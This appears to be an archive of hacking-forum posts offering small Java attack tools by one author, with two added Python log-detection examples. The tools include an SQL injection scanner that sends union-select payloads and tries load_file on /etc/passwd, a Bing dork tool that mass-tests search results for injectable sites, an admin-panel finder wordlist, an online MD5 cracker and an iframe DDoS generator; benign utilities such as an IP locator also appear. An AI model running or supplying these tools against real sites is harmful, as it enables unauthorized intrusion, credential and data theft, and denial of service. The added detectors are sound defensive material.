            writer.write(texto + "\r\n");
            writer.close();

        }

        private static String toma(String urla) throws Exception {

            String re;

            StringBuffer conte = new StringBuffer(40);

            URL url = new URL(urla);
            URLConnection hc = url.openConnection();
            hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

            BufferedReader nave = new BufferedReader(
                    new InputStreamReader(hc.getInputStream()));

            while ((re = nave.readLine()) != null) {
                conte.append(re);
            }

            nave.close();

            return conte.toString();

        }

        public static String encodehex(String text) {

    //Thanks to Katarina Majetic
    //Based on http://www.dzone.com/snippets/encode-string-hex

            byte[] z = text.getBytes();
            StringBuffer h = new StringBuffer();
            String l;
            int n;
            int a = z.length;
            int u;

            for (n = 0; n < a; n++) {
                u = z[n] & 0x000000FF;
                l = Integer.toHexString(u);
                h.append(l);
            }
            return "0x" + h.toString();
        }
    }

    //The End ?

#252
Java / Re: [Java] SQL Scanner 0.1
13 January 2013, 21:34 PM
Yes, I like doing translations; I write the same program in every language I know. That said, I'll add a usage example to the next code I publish.

P.S.: I added the usage example to the post.
#253
Java / [Java] SQL Scanner 0.1
13 January 2013, 03:40 AM
A simple SQLI scanner written in Java.

Code (java)

//SQL Scanner 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

   public static void main(String[] args) throws Exception {


       String codex;
       String target;

       Pattern uno = null;
       Matcher dos = null;

       Scanner host = new Scanner(System.in);
       System.out.println("\n\n-- == SQL Scanner 0.1 == --\n\n");
       System.out.println("[+] Page : ");
       target = host.nextLine();

       System.out.println("\n[+] Checking ...\n");

       codex = toma(target + "-1+union+select+666--");

       uno = Pattern.compile("The used SELECT statements have a different number of columns");
       dos = uno.matcher(codex);

       if (dos.find()) {
           System.out.println("[+] Scanning ...\n");

           int x;
           String urlfinal;
           String otrofinal;
           String code;
           String formariny;
           String otroformar;
           String link;

           urlfinal = "";
           formariny = "";

           for (x = 1; x <= 5; x = x + 1) {

//urlfinal = urlfinal+x+",";
               urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
               formariny = formariny + x + ",";

               otrofinal = urlfinal;
               otroformar = formariny;

               otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
               otroformar = otroformar.substring(0, otroformar.length() - 1);

               code = toma(target + "-1+union+select+" + otrofinal);

               uno = Pattern.compile("RATSXPDOWN(\\d+)");
               dos = uno.matcher(code);

               if (dos.find()) {

                   otroformar = otroformar.replace(dos.group(1), "hackman");

                   link = target + "-1+union+select+" + otroformar;

                   System.out.println("[Target] : " + link);
                   System.out.println("[Limit] : The site has " + x + " columns");
                   System.out.println("[Data] : The number " + dos.group(1) + " print data");

                   savefile("logs-scansql.txt", "[Target] : " + link);
                   savefile("logs-scansql.txt", "[Limit] : The site has " + x + " columns");
                   savefile("logs-scansql.txt", "[Data] : The number " + dos.group(1) + " print data");

                   System.out.println("\n[+] Searching informaion ...\n");

                   details(link);

                   System.out.println("\n[+] Finished");

                   System.out.println("\n-- == Coded By Doddy H == --");

                   savefile("logs-scansql.txt", "\n-----------------\n");

                   System.exit(1);

               }

           }
           System.out.println("[-] Error");
       } else {
           System.out.println("[-] Not vulnerable");
       }

   }

   private static void details(String urla) throws Exception {

       String concat;
       String code;

       Pattern uno = null;
       Matcher dos = null;

       concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

       urla = urla.replace("hackman", concat);

       code = toma(urla);

       uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
       dos = uno.matcher(code);

       if (dos.find()) {
           System.out.println("[+] DB Version : " + dos.group(1));
           System.out.println("[+] DB Name : " + dos.group(2));
           System.out.println("[+] Username : " + dos.group(3));

           savefile("logs-scansql.txt", "[+] DB Version : " + dos.group(1));
           savefile("logs-scansql.txt", "[+] DB Name : " + dos.group(2));
           savefile("logs-scansql.txt", "[+] Username : " + dos.group(3));

       } else {
           System.out.println("[-] Not found any data");
       }

       urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

       code = toma(urla + "+from+information_schema.tables--");
       uno = Pattern.compile("ERTOR854");
       dos = uno.matcher(code);

       if (dos.find()) {
           System.out.println("[+] information_schema : on");
           savefile("logs-scansql.txt", "[+] information_schema : on");
       } else {
           System.out.println("[-] information_schema : off");
       }

       code = toma(urla + "+from+mysql.user--");
       uno = Pattern.compile("ERTOR854");
       dos = uno.matcher(code);

       if (dos.find()) {
           System.out.println("[+] mysqluser : on");
           savefile("logs-scansql.txt", "[+] mysqluser : on");
       } else {
           System.out.println("[-] mysquser : off");
       }

       urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

//System.out.print(urla);

       code = toma(urla);
       uno = Pattern.compile("ERTOR854");
       dos = uno.matcher(code);

       if (dos.find()) {
           System.out.println("[-] load_file : on");
           savefile("logs-scansql.txt", "[-] load_file : on");
       } else {
           System.out.println("[-] load_file : off");
       }

   }

   private static void savefile(String nombre, String texto) throws Exception {

       FileWriter writer = new FileWriter(nombre, true);
       writer.write(texto + "\r\n");
       writer.close();

   }

   private static String toma(String urla) throws Exception {

       String re;

       StringBuffer conte = new StringBuffer(40);

       URL url = new URL(urla);
       URLConnection hc = url.openConnection();
       hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

       BufferedReader nave = new BufferedReader(
               new InputStreamReader(hc.getInputStream()));

       while ((re = nave.readLine()) != null) {
           conte.append(re);
       }

       nave.close();

       return conte.toString();

   }

   public static String encodehex(String text) {

//Thanks to Katarina Majetic
//Based on http://www.dzone.com/snippets/encode-string-hex

       byte[] z = text.getBytes();
       StringBuffer h = new StringBuffer();
       String l;
       int n;
       int a = z.length;
       int u;

       for (n = 0; n < a; n++) {
           u = z[n] & 0x000000FF;
           l = Integer.toHexString(u);
           h.append(l);
       }
       return "0x" + h.toString();
   }
}

//The End ?


Usage example



-- == SQL Scanner 0.1 == --


[+] Page :
http://localhost/sql.php?id=

[+] Checking ...

[+] Scanning ...

[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data

[+] Searching informaion ...

[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off

[+] Finished

-- == Coded By Doddy H == --
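
Added example, not part of the original posts: a log-side detector for the requests both scanner versions above send (the `-1+union+select` probe, hex and `char()` markers, `information_schema`, `mysql.user`, `load_file`). The log lines, IP addresses, rule names and the two-indicator threshold are constructed assumptions; the request strings and the User-Agent are taken from the posted source.

```python
import re
from urllib.parse import unquote_plus

# User-Agent hard-coded in the posted toma() helper. Trivial to change, so it
# only counts as one weak indicator among several.
SCANNER_UA = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) "
              "Gecko/20080201Firefox/2.0.0.12")

# Combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
HEX_RE = re.compile(r"\b0x([0-9a-f]+)", re.I)
CHAR_RE = re.compile(r"\bchar\s*\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", re.I)

RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "sql_comment_tail": re.compile(r"--\s*$"),
    "schema_enum": re.compile(r"\b(?:information_schema\.\w+|mysql\.user)\b", re.I),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+outfile\b", re.I),
}


def printable(text):
    """True for ASCII text of three or more printable characters."""
    return len(text) >= 3 and all(" " <= c <= "~" for c in text)


def decode_literals(query):
    """Return the text hidden in MySQL hex literals (0x...) and char(n,...) lists."""
    found = []
    for m in HEX_RE.finditer(query):
        digits = m.group(1)
        if len(digits) % 2 == 0:
            text = bytes.fromhex(digits).decode("latin-1")
            if printable(text):
                found.append(text)
    for m in CHAR_RE.finditer(query):
        codes = [int(n) for n in re.split(r"\s*,\s*", m.group(1))]
        if all(c < 256 for c in codes):
            text = "".join(map(chr, codes))
            if printable(text):
                found.append(text)
    return found


def score_request(query, user_agent):
    """Return (indicator names, decoded literals) for one decoded query string."""
    indicators = [name for name, rx in RULES.items() if rx.search(query)]
    decoded = decode_literals(query)
    if decoded:
        indicators.append("encoded_literal")
    if user_agent == SCANNER_UA:
        indicators.append("scanner_user_agent")
    return indicators, decoded


def analyze(lines, threshold=2):
    """Alert on requests with at least `threshold` independent indicators."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "?" not in m["target"]:
            continue
        query = unquote_plus(m["target"].split("?", 1)[1])
        indicators, decoded = score_request(query, m["ua"])
        if len(indicators) >= threshold:
            alerts.append({"ip": m["ip"], "query": query,
                           "indicators": indicators, "decoded": decoded})
    return alerts


def log_line(ip, target, ua=SCANNER_UA):
    """Build one constructed log line (not real traffic)."""
    return (f'{ip} - - [13/Jan/2013:03:40:00 +0000] "GET {target} HTTP/1.1" '
            f'200 512 "-" "{ua}"')


MARKER = "0x" + "RATSXPDOWN1".encode().hex()  # same encoding as the posted encodehex()
SAMPLE_LOG = [
    log_line("203.0.113.7", "/sql.php?id=-1+union+select+666--"),
    log_line("203.0.113.7", "/sql.php?id=-1+union+select+" + MARKER),
    log_line("203.0.113.7", "/sql.php?id=-1+union+select+unhex(hex(concat("
             "0x4b30425241,table_name,0x4b30425241))),2,3"
             "+from+information_schema.tables+limit+0,1--"),
    log_line("203.0.113.7", "/sql.php?id=-1+union+select+concat(char(69,82,84,"
             "79,82,56,53,52),load_file(0x2f6574632f706173737764)),2,3"),
    log_line("198.51.100.20", "/sql.php?id=42", ua="Mozilla/5.0 (X11; Linux x86_64)"),
    # Benign text that contains the keywords: one indicator only, so no alert.
    log_line("198.51.100.20", "/search.php?q=student+union+select+committee",
             ua="Mozilla/5.0 (X11; Linux x86_64)"),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert["ip"], alert["indicators"], alert["decoded"])
```

A hit shows probing, not the fix: the injectable query still needs a parameterized statement, and not echoing database errors to the page removes the column-count message these tools test for.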

#254
Java / [Java] BingHack Tool 0.1
13 January 2013, 03:39 AM
A simple program to search Bing for pages vulnerable to SQLI.

Code (java)

//
//BingHack Tool 0.1
//Coded By Doddy H
//

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String code;
        String tar;
        int x;
        String dork;
        int counte;
        String urlfinal;

        Pattern uno = null;
        Matcher dos = null;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == BingHack Tool 0.1 == --\n\n");
        System.out.println("[+] Dork : ");
        dork = host.nextLine();

        System.out.println("[+] Count : ");
        counte = host.nextInt();

        System.out.println("\n[+] Searching ...\n");

        for (x = 10; x <= counte; x = x + 10) {

            code = toma("http://www.bing.com/search?q=" + dork + "&first=" + x);

            uno = Pattern.compile("<h3><a href=\"(.*?)\"");
            dos = uno.matcher(code);

            while (dos.find()) {

                urlfinal = cortar(dos.group(1));

                sql(urlfinal);

            }

        }

        System.out.println("\n[+] Finished");
        System.out.println("\n-- == Coded By Doddy H == --");

    }

    private static void savefile(String nombre, String texto) throws Exception {

        FileWriter writer = new FileWriter(nombre, true);
        writer.write(texto + "\r\n");
        writer.close();

    }

    private static void sql(String urla) throws Exception {

        String code;
        String mostrar;

        Pattern uno = null;
        Matcher dos = null;

        mostrar = urla + "-1+union+select+666--";

        try {
            code = toma(mostrar);

            uno = Pattern.compile("The used SELECT statements have a different number of columns");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] SQLI : " + urla);
                savefile("sql-logs.txt", urla);
            }

        } catch (Exception ex) {
        }

    }

    private static String cortar(String urla) throws Exception {

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("(.*)=(.*)");
        dos = uno.matcher(urla);

        if (dos.find()) {

            return (dos.group(1) + "=");
        } else {
            return "no tengo idea xDD";
        }

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

//The End ?
#255
Java / [Java] LocateIP 0.1
13 January 2013, 03:39 AM
A simple program to look up the location of an IP.

Code (java)

//LocateIP 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String ip;
        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == LocateIP 0.1 == --\n\n");
        System.out.println("[+] IP : ");
        ip = host.nextLine();

        String code;

        code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress=" + ip);

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("City</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] City : Not Found");
        } else {
            System.out.println("[+] City : " + dos.group(2));
        }

        uno = Pattern.compile("Country</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] Country : Not Found");
        } else {
            System.out.println("[+] Country : " + dos.group(2));
        }

        uno = Pattern.compile("State or Region</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] State or Region : Not Found");
        } else {
            System.out.println("[+] State or Region : " + dos.group(2));
        }

//code = toma("http://www.ip-adress.com/reverse_ip/178.33.230.100");

//uno = Pattern.compile("/whois/(.*?)\">Whois");
//dos = uno.matcher(code);

//while(dos.find()) {
//System.out.println("[+] DNS : "+dos.group(1));
//}

        System.out.println("\n\n-- == Coded By Doddy H == --");

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

// The End ?
#256
Java / [Java] PanelFinder 0.1
13 January 2013, 03:39 AM
A simple program to find the famous administration panel on a page.

Code (java)

//PanelFinder 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.net.URL;

public class Main {

    public static void main(String[] args) {

        String[] paneles = {
            "admin/admin.asp", "admin/login.asp", "admin/index.asp", "admin/admin.aspx", "admin/login.aspx", "admin/index.aspx", "admin/webmaster.asp", "admin/webmaster.aspx", "asp/admin/index.asp", "asp/admin/index.aspx", "asp/admin/admin.asp", "asp/admin/admin.aspx", "asp/admin/webmaster.asp", "asp/admin/webmaster.aspx", "admin/", "login.asp", "login.aspx", "admin.asp", "admin.aspx", "webmaster.aspx", "webmaster.asp", "login/index.asp", "login/index.aspx", "login/login.asp", "login/login.aspx", "login/admin.asp", "login/admin.aspx", "administracion/index.asp", "administracion/index.aspx", "administracion/login.asp", "administracion/login.aspx", "administracion/webmaster.asp", "administracion/webmaster.aspx", "administracion/admin.asp", "administracion/admin.aspx", "php/admin/", "admin/admin.php", "admin/index.php", "admin/login.php", "admin/system.php", "admin/ingresar.php", "admin/administrador.php", "admin/default.php", "administracion/", "administracion/index.php", "administracion/login.php", "administracion/ingresar.php", "administracion/admin.php", "administration/", "administration/index.php", "administration/login.php", "administrator/index.php", "administrator/login.php", "administrator/system.php", "system/", "system/login.php", "admin.php", "login.php", "administrador.php", "administration.php", "administrator.php", "admin1.html", "admin1.php", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "adm/", "admin/account.php", "admin/account.html", "admin/index.html", "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/login.html", "administrator/account.html", "administrator/account.php", "administrator.html", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", 
"moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/home.asp", "admin/controlpanel.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", 
"SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/"};

        String target;
        String ur;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == PanelFinder 0.1 == --\n\n");
        System.out.println("[+] URL : ");
        target = host.nextLine();

        System.out.println("\n[+] Scanning ...\n");

        for (int count = 0; count < paneles.length; count++) {

            ur = target + "/" + paneles[count];

            try {

                URL u = new URL(ur);

                Object o = u.getContent();
                System.out.println("[+] Link : " + ur);
            } catch (Exception ex) {
            }

        }

        System.out.println("\n[+] Finished\n");
        System.out.println("-- == Coded By Doddy H == --");

    }
}

//The End ?
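
Added example, not part of the original post: how a run of a wordlist tool like the one above looks in an access log, with a sliding-window check that flags the client and lists the paths that did not return 404. The log lines, addresses, window and threshold are constructed assumptions; the probed paths are entries from the posted list.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) ')


def find_enumeration(lines, window_seconds=60, min_misses=5):
    """Flag clients that hit >= min_misses distinct 404 paths inside the window.

    Returns {ip: {"max_misses": n, "answered": [(path, status), ...]}} where
    "answered" holds every request from that client that did not return 404.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)    # ip -> (timestamp, path) of recent 404s
    answered = defaultdict(list)   # ip -> responses other than 404
    flagged = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, status = m["ip"], int(m["status"])
        path = m["path"].split("?", 1)[0]
        if status != 404:
            answered[ip].append((path, status))
            continue
        misses = recent[ip]
        misses.append((ts, path))
        while ts - misses[0][0] > window:   # drop 404s older than the window
            misses.popleft()
        distinct = {p for _, p in misses}
        if len(distinct) >= min_misses:
            report = flagged.setdefault(ip, {"max_misses": 0})
            report["max_misses"] = max(report["max_misses"], len(distinct))
    for ip, report in flagged.items():
        report["answered"] = answered[ip]
    return flagged


def log_line(ip, second, path, status):
    """Build one constructed log line (not real traffic)."""
    return (f'{ip} - - [13/Jan/2013:03:39:{second:02d} +0000] '
            f'"GET {path} HTTP/1.1" {status} 0 "-" "-"')


# First entries of the posted list, requested one per second by one client.
PROBES = ["admin/admin.asp", "admin/login.asp", "admin/index.asp",
          "admin/admin.aspx", "admin/login.aspx", "admin/index.aspx"]
SAMPLE_LOG = [log_line("203.0.113.9", i, "/" + p, 404) for i, p in enumerate(PROBES)]
SAMPLE_LOG += [
    log_line("203.0.113.9", 6, "/admin/", 200),
    log_line("198.51.100.4", 7, "/index.php", 200),
    log_line("198.51.100.4", 8, "/favicon.ico", 404),   # ordinary single miss
    log_line("203.0.113.9", 9, "/phpmyadmin/", 403),
]

if __name__ == "__main__":
    for ip, report in find_enumeration(SAMPLE_LOG).items():
        print(ip, report["max_misses"], report["answered"])
```

Paths listed under `answered` are the ones the client learned exist, including those that replied 403, so they are the first candidates for an allow-list or an extra authentication layer.
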
#257
Java / [Java] CrackHash 0.1
13 January 2013, 03:38 AM
A simple program to crack an MD5 hash using an online page.

Code (java)

//
//CrackHash 0.1
//Coded By Doddy H
//
//Test with 098f6bcd4621d373cade4e832627b4f6
//
//

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String hash;
        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == CrackHash 0.1 == --\n\n");
        System.out.println("[+] Hash : ");
        hash = host.nextLine();

        String code;

        code = toma("http://md5.hashcracking.com/search.php?md5=" + hash);

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("Cleartext of (.*) is (.*)");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("\n[-] Not Found");
        } else {
            System.out.println("\n[+] Hash Cracked : " + dos.group(2));
        }

        System.out.println("\n\n-- == Coded By Doddy H == --");

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

//The End ?
#258
Java / [Java] URL Shorter 0.1
12 January 2013, 03:11 AM
A simple program to shorten URLs.

Code (java)

/**
* URL Shorter 0.1
* Coded By Doddy H
*/

import java.util.Scanner;
import java.net.*;
import java.io.*;

public class Main {
    public static void main(String[] args) throws Exception {
       
      String pagina;
      String re;
     
      Scanner host = new Scanner(System.in);
      System.out.println("\n\n-- == URL Shorter 0.1 == --\n\n");
      System.out.println("[+] Page : ");
      pagina = host.nextLine();

      URL cargar = new URL("http://tinyurl.com/api-create.php?url="+pagina);
      BufferedReader nave = new BufferedReader(
      new InputStreamReader(cargar.openStream()));

      while ((re = nave.readLine()) != null)
        System.out.println("\n[+] Link : "+re);
      nave.close();
   
      System.out.println("\n\n-- == Coded By Doddy H == --");
    }
}

/**
* The End ?
*/
#259
Java / [Java] Iframe DDOS
12 January 2013, 03:11 AM
A simple PoC for iframe DDoS.

Code (java)

/**
* Iframe DDOS 0.1
* Coded By Doddy H
*/

import java.util.Scanner;
import java.net.*;
import java.io.*;

public class Main {
    public static void main(String[] args) throws IOException{

      String pagina;
      int cantidad;
      int y;

      FileOutputStream fos;
      DataOutputStream dos;

      Scanner host = new Scanner(System.in);
      System.out.println("\n\n-- == Iframe DDOS 0.1 == --\n\n");
      System.out.println("[+] Page : ");
      pagina = host.nextLine();
      System.out.println("[+] Count : ");
      cantidad = host.nextInt();

      FileWriter ar=new FileWriter("poc.html");
      BufferedWriter go=new BufferedWriter(ar);
      PrintWriter archivo=new PrintWriter(go);

      for (y=1;y<=cantidad;y++){
        archivo.println("<iframe src='"+pagina+"' width='3' height='3'></iframe><br>");
      }
      archivo.close();
      System.out.println("\n[+] All done ...");
      System.out.println("\n\n-- == Coded By Doddy H == --");
    }
}

/**
* The End ?
*/
#260
Scripting / The Christmas script
24 December 2012, 14:56 PM
Ha, as a Christmas present I'm leaving you the Christmas script xDDD.

The code

Code (perl)

#!/usr/bin/perl
#The Christmas script
#Coded By Doddy H

while(true) {

my($dia,$mes,$año,$hora,$minutos,$segundos) = agarrate_la_hora();

unless($dia eq "25" and $mes eq "12") {
syswrite STDOUT,"[+] Fecha y hora : $dia/$mes/$año $hora:$minutos:$segundos \r";
} else {
syswrite STDOUT,"\n\n[+] Feliz navidad !";
<stdin>;
exit(1);
}

}

sub agarrate_la_hora {

my ($a,$b,$c,$d,$e,$f,$g,$h,$i) = localtime(time);

$f+= 1900;
$e++;

return($d,$e,$f,$c,$b,$a);

}

#The End ?